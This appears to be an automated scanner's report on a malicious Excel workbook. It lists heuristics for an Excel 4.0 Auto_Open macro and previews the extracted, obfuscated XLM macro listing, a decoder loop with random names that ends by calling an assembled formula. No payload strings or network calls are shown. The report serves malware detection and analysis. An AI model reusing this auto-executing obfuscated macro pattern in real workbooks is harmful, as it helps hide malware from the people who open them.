MALICIOUS
140
Risk Score
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6695 bytes |
SHA-256: 3dec0cf158df8d1e2d928f69f5bb72e3cf5c73ac334aa4214082bf10cfa08c14 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - aRPNAjS
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!B147
' 0018 24 LABEL : Cell Value, String Constant - bpKIBYLfU len=0
' 0018 22 LABEL : Cell Value, String Constant - CPuqxvj len=0
' 0018 27 LABEL : Cell Value, String Constant - DavBMLHfjAvA len=0
' 0018 23 LABEL : Cell Value, String Constant - GNPqoMbc len=0
' 0018 23 LABEL : Cell Value, String Constant - iBzUQrqb len=0
' 0018 26 LABEL : Cell Value, String Constant - KuDkrttCQEj len=0
' 0018 20 LABEL : Cell Value, String Constant - lBLfN len=0
' 0018 21 LABEL : Cell Value, String Constant - lHPyhE len=0
' 0018 23 LABEL : Cell Value, String Constant - LXSmwPdB len=0
' 0018 23 LABEL : Cell Value, String Constant - MTNMvTxA len=0
' 0018 25 LABEL : Cell Value, String Constant - opNiBCZwWQ len=0
' 0018 25 LABEL : Cell Value, String Constant - OwoUBuUBpA len=0
' 0018 20 LABEL : Cell Value, String Constant - pgoos len=0
' 0018 27 LABEL : Cell Value, String Constant - qLkUdnrGTjth len=0
' 0018 21 LABEL : Cell Value, String Constant - suYCvm len=0
' 0018 24 LABEL : Cell Value, String Constant - tZLQGyTZC len=0
' 0018 20 LABEL : Cell Value, String Constant - UdgOh len=0
' 0018 21 LABEL : Cell Value, String Constant - uLcmRv len=0
' 0018 25 LABEL : Cell Value, String Constant - wtLkyEssGe len=0
' 0018 26 LABEL : Cell Value, String Constant - xqWiabLHODu len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' aRPNAjS,P57,"",829.00000000000000000000
' aRPNAjS,P58,"",-251.00000000000000000000
' aRPNAjS,B59,"SET.NAME("UdgOh",0+VALUE("0"))",""
' aRPNAjS,P59,"",-648.00000000000000000000
' aRPNAjS,P60,"",-970.00000000000000000000
' aRPNAjS,B61,"SET.NAME("uLcmRv",UdgOh)",""
' aRPNAjS,P61,"",11.00000000000000000000
' aRPNAjS,P62,"",-362.00000000000000000000
' aRPNAjS,B63,"SET.NAME("DavBMLHfjAvA",UdgOh)",""
' aRPNAjS,B67,"SET.NAME("qLkUdnrGTjth",COUNTA(KuDkrttCQEj))",""
' aRPNAjS,B72,"SET.NAME("pgoos",COUNTA(LXSmwPdB))",""
' aRPNAjS,B77,[],""
' aRPNAjS,B81,"SET.NAME("tZLQGyTZC","")",""
' aRPNAjS,B86,"uLcmRv",""
' aRPNAjS,B91,"SET.NAME("MTNMvTxA",HLOOKUP("*",KuDkrttCQEj,uLcmRv,FALSE))",""
' aRPNAjS,B96,"lBLfN",""
' aRPNAjS,B98,"SET.NAME("suYCvm",UdgOh)",""
' aRPNAjS,B101,[],""
' aRPNAjS,B103,"suYCvm",""
' aRPNAjS,B105,"lHPyhE",""
' aRPNAjS,B107,"wtLkyEssGe",""
' aRPNAjS,B111,"OwoUBuUBpA",""
' aRPNAjS,B114,"SET.NAME("iBzUQrqb",VALUE(HLOOKUP("*",LXSmwPdB,OwoUBuUBpA,FALSE)))",""
' aRPNAjS,B116,"CPuqxvj",""
' aRPNAjS,B118,"tZLQGyTZC",""
' aRPNAjS,B122,"DavBMLHfjAvA",""
' aRPNAjS,B124,NEXT(),""
' aRPNAjS,B126,"opNiBCZwWQ",""
' aRPNAjS,B130,[],""
' aRPNAjS,B134,"xqWiabLHODu",""
' aRPNAjS,B139,NEXT(),""
' aRPNAjS,B143,RETURN(),""
' aRPNAjS,B175,"SET.NAME("bpKIBYLfU",B59)",""
' aRPNAjS,B178,"KuDkrttCQEj",""
' aRPNAjS,B182,"SET.NAME("LXSmwPdB",R40C13)",""
' aRPNAjS,B185,"SET.NAME("xqWiabLHODu",193)",""
' aRPNAjS,B188,"SET.NAME("GNPqoMbc",2)",""
' aRPNAjS,B192,bpKIBYLfU(),""
' aRPNAjS,B193,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.